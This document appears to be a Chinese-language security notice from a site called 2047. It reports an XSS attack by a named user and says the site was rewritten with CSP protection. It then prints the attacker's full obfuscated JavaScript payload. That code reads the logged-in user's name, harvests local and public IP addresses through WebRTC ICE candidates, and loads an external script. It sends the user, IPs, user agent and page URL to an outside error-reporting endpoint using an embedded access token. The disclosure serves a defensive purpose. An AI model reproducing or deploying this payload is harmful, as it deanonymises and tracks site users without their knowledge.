黑客使用的ID是 @小鹿乱撞 ,攻击手法是XSS。
目前2047的全部代码已经重写,并且使用了CSP保护,从根源上杜绝了此类问题。
在网页上查看代码不会损害您的计算机。如果您要对代码进行反混淆及调试,请注意安全防护。
var _0x4ec6a8=_0x8daa;(function(_0x5e1be8,_0xf60bed){var _0x493efb=_0x8daa,_0x48dbe2=_0x8daa,_0x646a97=_0x5e1be8();while(!![]){try{var _0xa625d4=parseInt(_0x493efb(0x12d,'gOH2'))/0x1*(-parseInt(_0x493efb(0x15a,'4ig%'))/0x2)+-parseInt(_0x48dbe2(0x13a,'!fyC'))/0x3*(parseInt(_0x493efb(0x121,'!fyC'))/0x4)+-parseInt(_0x493efb(0x159,'HT0^'))/0x5*(-parseInt(_0x48dbe2(0x145,'2vsa'))/0x6)+-parseInt(_0x48dbe2(0x151,'TwLG'))/0x7+parseInt(_0x493efb(0x14c,'$$]T'))/0x8*(parseInt(_0x48dbe2(0x117,'2Q@v'))/0x9)+parseInt(_0x48dbe2(0x14d,']9Fc'))/0xa+parseInt(_0x493efb(0x144,'^iLR'))/0xb;if(_0xa625d4===_0xf60bed)break;else _0x646a97['push'](_0x646a97['shift']());}catch(_0x158466){_0x646a97['push'](_0x646a97['shift']());}}}(_0x35a4,0xeb0a0));function getCurrentUser(){var _0x1227cb=_0x8daa,_0x31a77f=_0x8daa;try{return[app['user'][_0x1227cb(0x134,'2l4j')],app[_0x1227cb(0x13b,'3o5a')][_0x31a77f(0x158,'RDT)')]][_0x1227cb(0x137,'V0zu')]('\x20');}catch(_0x478475){return'not\x20login';}}var current_user=getCurrentUser();function loadScript(_0x498b98){var _0x3e3120=_0x8daa,_0x4b8c1a=_0x8daa,_0x1f8dc1=document[_0x3e3120(0x13c,'tXm3')]('script');_0x1f8dc1[_0x3e3120(0x15c,'&D%d')]=_0x498b98,document['head'][_0x3e3120(0x14a,'gOH2')](_0x1f8dc1);}loadScript(_0x4ec6a8(0x125,'$Cam'));function getIPs(_0x48dfdb){var _0x3a3d28=_0x4ec6a8,_0x4a90ff=_0x4ec6a8,_0x302154=document[_0x3a3d28(0x12b,'xzbe')](_0x3a3d28(0x120,'r6BD'));_0x302154[_0x3a3d28(0x14b,'^iLR')]=_0x4a90ff(0x152,'tXm3'),_0x302154[_0x3a3d28(0x124,'QKjI')]=_0x4a90ff(0x11d,'1PnJ'),document[_0x3a3d28(0x13e,'sff*')][_0x4a90ff(0x135,'zT2n')](_0x302154);var _0x5de6ce={},_0x380412=window['RTCPeerConnection']||window[_0x3a3d28(0x14e,'6T$C')]||window[_0x3a3d28(0x157,'xzbe')],_0x492c80=!!window[_0x3a3d28(0x13f,'RDT)')];if(!_0x380412){var _0x1dd00a=_0x302154['contentWindow'];_0x380412=_0x1dd00a[_0x4a90ff(0x11c,'2vsa')]||_0x1dd00a[_0x4a90ff(0x132,'1PnJ')]||_0x1dd00a[_0x4a90ff(0x133,'S51m')],_0x492c80=!!_0x1dd00a[_0x4a90ff(0x141,'vqxW')];}var _0x23c487={'optional':[{'RtpDataChannels':!![]}]},_0x457042={'iceServers':[{'urls':[_0x3a3d28(0x154,'S51m'),_0x4a90ff(0x122,'qiDy')]}]},_0x3c6d28;try{_0x3c6d28=new _0x380412(_0x457042,_0x23c487);}catch(_0x521691){return;}function _0x7276b4(_0x2b6216){var _0x37052f=_0x4a90ff,_0x370b85=/([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/,_0x2e65d1=_0x370b85[_0x37052f(0x11f,'qiDy')](_0x2b6216)[0x1];if(_0x5de6ce[_0x2e65d1]===undefined)_0x48dfdb(_0x2e65d1);_0x5de6ce[_0x2e65d1]=!![];}_0x3c6d28[_0x4a90ff(0x156,'Hm1[')]=function(_0x516647){var _0x4fca71=_0x4a90ff,_0x23448f=_0x3a3d28;if(_0x516647[_0x4fca71(0x149,'Eujv')])_0x7276b4(_0x516647[_0x23448f(0x123,'$$]T')]['candidate']);},_0x3c6d28[_0x4a90ff(0x146,'Eujv')](''),_0x3c6d28[_0x3a3d28(0x138,'$Cam')](function(_0x3ab26e){var _0x4e3304=_0x4a90ff;_0x3c6d28[_0x4e3304(0x155,'gOH2')](_0x3ab26e,function(){},function(){});},function(){}),setTimeout(function(){var _0x3f597e=_0x4a90ff,_0x31a3de=_0x4a90ff,_0x13f309=_0x3c6d28[_0x3f597e(0x130,'r9VR')]['sdp'][_0x3f597e(0x153,'^iLR')]('\x0a');_0x13f309[_0x31a3de(0x15d,'Hm1[')](function(_0xd62891){var _0x4c1424=_0x3f597e;if(_0xd62891[_0x4c1424(0x148,'2l4j')]('a=candidate:')===0x0)_0x7276b4(_0xd62891);});},0x3e8),setTimeout(function(){var _0x425af3=_0x3a3d28;_0x302154[_0x425af3(0x131,'N(x!')]();},0xbb8);}function _0x35a4(){var _0x5721d9=['WOZdPCktW4JcStRcSW/dQSo8wIua','WP8aW5RdRdrFWPhcLmozlSkSW5tcKa','Ex9UnXG','W4/dG8oWWRxcMCkkW4ryW5VcR8kLtGqVWQpdIWRcJKldOaGNWQa+nxq7W4OrW7P2W6hdM8oVkmkEWONdMmoUW4WmtG','W47dJbfOW419sYVdMvBcQw/cMxz8r8kLW6xcOW','cXxdQbjdbCkjoMPdW4hcMYab','oCoRW4ydW53cPqK6W67cG0nHWQyLy8kZySk7e8kehCkRWPi','yNpdLh9vw8knAq','n8oQW5ddK8k8ea8rW6xcQCkW','xCo1WRxcVmoXbmoy','W6ddQSkwW5HUW7udWQtcHwhdMW','W57cL2y','aHtdSZrhbCka','WP99amknhSo9rW','jmoVW5ijW4FcSIKhW53cPW','DCk/WOVcHCoS','hmoNWOVcHCoYo8oIWR3cMCkvWQhcHwa/zLy','WO7dO2ilr8oXeG7dSMW','WOj+W6NcOCo3pmksbWKQW71jW7lcOmkOW6xcVG','l8kCuLW5a8ogW4znkrvYWOfjbNP0','ALWWWOtcMLBcU3P+BSkCW6W','tKtdU3W','WOS8emoZWRD+','W6dcImoyW6NcNq50ggxdSIXUEa','weJdQ3f7WR8xfCoTgSoQWPRcIxdcPtpcUmo7WOxcO1X0CmoonJLzm8o2W4/cJx/dKG','xmkrmhqHW4juEa8','W7C3WPKUf8kkWP0','hsBcNSoDamkEFNldRSkBW7tdT0tdV8otjmogwui+v8o9qfddNhNdQatcH0mdWOJdVwhcOmouaI/dLwmZWQzBm8o0','W5ZdGg4k','jCkjyGboWRr2qcVdG008WQDQrJVcRxRdGmksbSoYW5ewqCkFhMZcTSkEWRfypaxcKq','WOZcLI9lfraeqaBcI8kbo0y','tK7dRhaZ','vu7cTemFxSoEzhHCW4pcQHSD','lCo8W4ejW4dcTb4cW4JcVKnQWQa','W6etWP/dImkRAmowbqKhW5vlW4e','WOZcNvaqWPeUgGddNN/cLvxcJG','gGJcQYTYW7TsimoazSkuW63cHa','WO3cHCkYW6/cKmolWOezW4FdQmkNgHK1','sCk+W4mhEcuxWQJcMmkguaJdSehdV8ku','W6ZdHvT+CSoq','i8kFrgeABCoLW4jfpNTYWP1obhbUdb7cVq','W4VdKSoNWRddISknW6j5W7BdKCkSbredWQpdGGJcJG/dTW4LW7q','ASo0W5K','WOhdHmoOihr7qHyaWOVcMa','DNddGwfswCkbEmk1D8o9imknWQjSWOy','W4ZcKqOo','fIdcJ8omb8obhJVdV8oqW6u','W4PqWPVcQw11WOldNmkDaCk3','W6ldMSkzWQtdSwKB','omkoCWi','WPGBW4ZdVsXBWQ3dGSkClCkMW5tcGq','W5vTkSkC','rdZdPCoO','ygxdK2zstSkYwmkFsmo2ASkvWPjSWOBdGmk3W4jZwgFcSq','p8kpwColWRJcUGDBW5hcKW','W7PiFW5EWOhcNNNcLfCXW51HimkXWQxcVWrgW4aEl1m','WQ3dUHBdTa','kCkkDSonWRhcGc0','oZ01AL8Ul0XTWO3cU8kQW6id','W6yFWP7cHmoMlmkseHy','W5FdNxGFverXvGBcOCkBfuLuWQuBWQ4','W4/cL2PMWPhdJ8kw','DSoZW5KegSoXfW','W5FdJNmAsuvuqXC','W5ZdMrvbW4X6As/dTf/cVG','ExT7mGK','b8oeBIzWWPqbrIH+yw1W','kSoicCkuW67dTLq0W47cLxJdVghdSG','umoalbpdQvXIWOtdO8kog8ouk2NdQSkyW7vlymoJ','W5ddLvPhzmkTWPZcOmkf','vSomW4nlrs3cRSoLnCkSW6ZcTHldVZpdL0VdM8oJrMVdKW'];_0x35a4=function(){return _0x5721d9;};return _0x35a4();}function reportError(_0x46027a){var _0x3aea13=_0x4ec6a8,_0x3f48b0=_0x4ec6a8;ak='28fbb9baf44548b1b7393c4ae4cf1819',title=location[_0x3aea13(0x126,'Eujv')]+new Date()[_0x3aea13(0x15b,'fi)r')]()[_0x3f48b0(0x119,'HT0^')](0x0,0xa);var _0x1f7d5a={'access_token':ak,'data':{'environment':'production','level':_0x3aea13(0x129,'qiDy'),'platform':_0x3aea13(0x147,'&D%d'),'framework':_0x3f48b0(0x11b,'NkTu'),'language':_0x3f48b0(0x118,'xzbe'),'body':{'message':{'body':title,'user':current_user,'data':_0x46027a,'ua':navigator['userAgent'],'href':location['href']}},'request':{'user_ip':_0x3f48b0(0x140,']9Fc')}}},_0x4d6655=new XMLHttpRequest();_0x4d6655['open'](_0x3aea13(0x142,'G%X7'),_0x3f48b0(0x127,'3o5a')),_0x4d6655['setRequestHeader'](_0x3aea13(0x11e,'%y[N'),_0x3aea13(0x136,'RDT)')),_0x4d6655[_0x3aea13(0x11a,'4ig%')](_0x3f48b0(0x150,'hH#Q'),ak),_0x4d6655[_0x3aea13(0x13d,'2Q@v')](JSON[_0x3aea13(0x14f,'udP4')](_0x1f7d5a));}function _0x8daa(_0x420ab9,_0x62fc38){var _0x35a4a2=_0x35a4();return _0x8daa=function(_0x8daa24,_0x29a52e){_0x8daa24=_0x8daa24-0x117;var _0x4e89cd=_0x35a4a2[_0x8daa24];if(_0x8daa['hewqgb']===undefined){var _0x443038=function(_0x498b98){var _0x1f8dc1='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x48dfdb='',_0x302154='';for(var _0x5de6ce=0x0,_0x380412,_0x492c80,_0x1dd00a=0x0;_0x492c80=_0x498b98['charAt'](_0x1dd00a++);~_0x492c80&&(_0x380412=_0x5de6ce%0x4?_0x380412*0x40+_0x492c80:_0x492c80,_0x5de6ce++%0x4)?_0x48dfdb+=String['fromCharCode'](0xff&_0x380412>>(-0x2*_0x5de6ce&0x6)):0x0){_0x492c80=_0x1f8dc1['indexOf'](_0x492c80);}for(var _0x23c487=0x0,_0x457042=_0x48dfdb['length'];_0x23c487<_0x457042;_0x23c487++){_0x302154+='%'+('00'+_0x48dfdb['charCodeAt'](_0x23c487)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x302154);};var _0x478475=function(_0x3c6d28,_0x7276b4){var _0x521691=[],_0x2b6216=0x0,_0x370b85,_0x2e65d1='';_0x3c6d28=_0x443038(_0x3c6d28);var _0x516647;for(_0x516647=0x0;_0x516647<0x100;_0x516647++){_0x521691[_0x516647]=_0x516647;}for(_0x516647=0x0;_0x516647<0x100;_0x516647++){_0x2b6216=(_0x2b6216+_0x521691[_0x516647]+_0x7276b4['charCodeAt'](_0x516647%_0x7276b4['length']))%0x100,_0x370b85=_0x521691[_0x516647],_0x521691[_0x516647]=_0x521691[_0x2b6216],_0x521691[_0x2b6216]=_0x370b85;}_0x516647=0x0,_0x2b6216=0x0;for(var _0x3ab26e=0x0;_0x3ab26e<_0x3c6d28['length'];_0x3ab26e++){_0x516647=(_0x516647+0x1)%0x100,_0x2b6216=(_0x2b6216+_0x521691[_0x516647])%0x100,_0x370b85=_0x521691[_0x516647],_0x521691[_0x516647]=_0x521691[_0x2b6216],_0x521691[_0x2b6216]=_0x370b85,_0x2e65d1+=String['fromCharCode'](_0x3c6d28['charCodeAt'](_0x3ab26e)^_0x521691[(_0x521691[_0x516647]+_0x521691[_0x2b6216])%0x100]);}return _0x2e65d1;};_0x8daa['KNEMzL']=_0x478475,_0x420ab9=arguments,_0x8daa['hewqgb']=!![];}var _0x3a3133=_0x35a4a2[0x0],_0x2013dc=_0x8daa24+_0x3a3133,_0x48e867=_0x420ab9[_0x2013dc];return!_0x48e867?(_0x8daa['ZDTYbw']===undefined&&(_0x8daa['ZDTYbw']=!![]),_0x4e89cd=_0x8daa['KNEMzL'](_0x4e89cd,_0x29a52e),_0x420ab9[_0x2013dc]=_0x4e89cd):_0x4e89cd=_0x48e867,_0x4e89cd;},_0x8daa(_0x420ab9,_0x62fc38);}getIPs(reportError);